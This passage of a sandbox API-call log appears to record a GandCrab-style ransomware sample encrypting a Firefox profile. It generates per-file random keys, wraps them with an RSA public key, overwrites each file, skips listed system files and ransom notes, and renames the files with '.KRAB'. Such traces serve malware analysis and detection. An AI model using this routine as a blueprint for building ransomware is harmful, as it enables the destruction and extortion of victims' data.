CryptImportKey (in: hProv=0x1011568, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xffe498) returned 1 [0078.180] CryptGetKeyParam (in: hKey=0xffe498, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0078.180] CryptEncrypt (in: hKey=0xffe498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0078.181] GetLastError () returned 0x0 [0078.181] CryptDestroyKey (hKey=0xffe498) returned 1 [0078.181] CryptReleaseContext (hProv=0x1011568, dwFlags=0x0) returned 1 [0078.181] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\compatibility.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0078.191] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0078.191] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0078.192] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0xd0, lpOverlapped=0x0) returned 1 [0078.273] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.273] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0xd0, lpOverlapped=0x0) returned 1 [0078.274] WriteFile (in: hFile=0x7ec, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0078.286] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.291] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.291] CloseHandle (hObject=0x7ec) returned 1 [0078.305] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.306] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\compatibility.ini"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\compatibility.ini.krab")) returned 1 [0078.307] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.307] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0078.307] lstrcmpW (lpString1="containers.json", lpString2=".") returned 1 [0078.307] lstrcmpW (lpString1="containers.json", lpString2="..") returned 1 [0078.307] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="containers.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json" [0078.307] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.308] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json.KRAB") returned 100 [0078.308] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json") returned 95 [0078.308] lstrlenW (lpString=".json") returned 5 [0078.308] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.308] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".json ") returned 6 [0078.308] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.309] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json") returned 95 [0078.309] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json") returned 95 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="desktop.ini") returned -1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="autorun.inf") returned 1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="ntuser.dat") returned -1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="iconcache.db") returned -1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="bootsect.bak") returned 1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="boot.ini") returned 1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="ntuser.dat.log") returned -1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="thumbs.db") returned -1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="KRAB-DECRYPT.html") returned -1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="KRAB-DECRYPT.txt") returned -1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="CRAB-DECRYPT.txt") returned -1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="ntldr") returned -1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="NTDETECT.COM") returned -1 [0078.309] lstrcmpiW (lpString1="containers.json", lpString2="Bootfont.bin") returned 1 [0078.309] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.310] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011700) returned 1 [0078.312] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.313] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.313] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.313] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0078.313] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0078.313] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.313] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10108a8) returned 1 [0078.315] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.315] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.315] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.316] CryptGenRandom (in: hProv=0x10108a8, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0078.316] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0078.316] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.316] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010b50) returned 1 [0078.317] CryptImportKey (in: hProv=0x1010b50, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xffe498) returned 1 [0078.317] CryptGetKeyParam (in: hKey=0xffe498, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0078.318] CryptEncrypt (in: hKey=0xffe498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0078.318] GetLastError () returned 0x0 [0078.318] CryptDestroyKey (hKey=0xffe498) returned 1 [0078.318] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0078.318] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010a40) returned 1 [0078.336] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xffe498) returned 1 [0078.336] CryptGetKeyParam (in: hKey=0xffe498, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0078.336] CryptEncrypt (in: hKey=0xffe498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0078.336] GetLastError () returned 0x0 [0078.336] CryptDestroyKey (hKey=0xffe498) returned 1 [0078.336] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0078.337] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\containers.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0078.337] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0078.338] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0078.338] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x329, lpOverlapped=0x0) returned 1 [0078.377] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffffcd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.377] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x329, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x329, lpOverlapped=0x0) returned 1 [0078.390] WriteFile (in: hFile=0x7ec, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0078.390] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.402] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.403] CloseHandle (hObject=0x7ec) returned 1 [0078.405] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.405] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\containers.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\containers.json.krab")) returned 1 [0078.409] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.409] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0078.409] lstrcmpW (lpString1="content-prefs.sqlite", lpString2=".") returned 1 [0078.409] lstrcmpW (lpString1="content-prefs.sqlite", lpString2="..") returned 1 [0078.409] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="content-prefs.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite" [0078.409] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.410] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite.KRAB") returned 105 [0078.410] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite") returned 100 [0078.410] lstrlenW (lpString=".sqlite") returned 7 [0078.410] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.410] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0078.410] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.410] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite") returned 100 [0078.410] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite") returned 100 [0078.410] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="desktop.ini") returned -1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="autorun.inf") returned 1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="ntuser.dat") returned -1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="iconcache.db") returned -1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="bootsect.bak") returned 1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="boot.ini") returned 1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="ntuser.dat.log") returned -1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="thumbs.db") returned -1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="KRAB-DECRYPT.html") returned -1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="KRAB-DECRYPT.txt") returned -1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="CRAB-DECRYPT.txt") returned -1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="ntldr") returned -1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="NTDETECT.COM") returned -1 [0078.411] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="Bootfont.bin") returned 1 [0078.411] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.413] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010c60) returned 1 [0078.417] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.417] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.418] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.418] CryptGenRandom (in: hProv=0x1010c60, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0078.418] CryptReleaseContext (hProv=0x1010c60, dwFlags=0x0) returned 1 [0078.418] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.418] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10108a8) returned 1 [0078.429] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.429] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.430] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.430] CryptGenRandom (in: hProv=0x10108a8, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0078.430] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0078.430] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.430] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010bd8) returned 1 [0078.441] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xffe498) returned 1 [0078.441] CryptGetKeyParam (in: hKey=0xffe498, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0078.442] CryptEncrypt (in: hKey=0xffe498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0078.442] GetLastError () returned 0x0 [0078.442] CryptDestroyKey (hKey=0xffe498) returned 1 [0078.442] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0078.442] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010ce8) returned 1 [0078.444] CryptImportKey (in: hProv=0x1010ce8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xffe958) returned 1 [0078.444] CryptGetKeyParam (in: hKey=0xffe958, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0078.444] CryptEncrypt (in: hKey=0xffe958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0078.444] GetLastError () returned 0x0 [0078.444] CryptDestroyKey (hKey=0xffe958) returned 1 [0078.444] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0078.444] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\content-prefs.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0078.469] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0078.470] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0078.470] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x38000, lpOverlapped=0x0) returned 1 [0078.553] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffc8000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.553] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x38000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x38000, lpOverlapped=0x0) returned 1 [0078.553] WriteFile (in: hFile=0x7ec, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0078.554] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.558] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.559] CloseHandle (hObject=0x7ec) returned 1 [0078.563] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.563] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\content-prefs.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\content-prefs.sqlite.krab")) returned 1 [0078.564] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.565] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0078.565] lstrcmpW (lpString1="cookies.sqlite", lpString2=".") returned 1 [0078.565] lstrcmpW (lpString1="cookies.sqlite", lpString2="..") returned 1 [0078.565] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="cookies.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite" [0078.565] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.565] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite.KRAB") returned 99 [0078.565] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned 94 [0078.565] lstrlenW (lpString=".sqlite") returned 7 [0078.565] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.566] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0078.566] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.566] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned 94 [0078.566] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned 94 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="desktop.ini") returned -1 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="autorun.inf") returned 1 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="ntuser.dat") returned -1 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="iconcache.db") returned -1 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="bootsect.bak") returned 1 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="boot.ini") returned 1 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="ntuser.dat.log") returned -1 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="thumbs.db") returned -1 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="KRAB-DECRYPT.html") returned -1 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="KRAB-DECRYPT.txt") returned -1 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="CRAB-DECRYPT.txt") returned -1 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="ntldr") returned -1 [0078.566] lstrcmpiW (lpString1="cookies.sqlite", lpString2="NTDETECT.COM") returned -1 [0078.567] lstrcmpiW (lpString1="cookies.sqlite", lpString2="Bootfont.bin") returned 1 [0078.567] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.567] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011348) returned 1 [0078.568] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.569] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.569] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.569] CryptGenRandom (in: hProv=0x1011348, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0078.569] CryptReleaseContext (hProv=0x1011348, dwFlags=0x0) returned 1 [0078.569] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.569] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010820) returned 1 [0078.571] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.571] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.572] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.572] CryptGenRandom (in: hProv=0x1010820, dwLen=0x8, 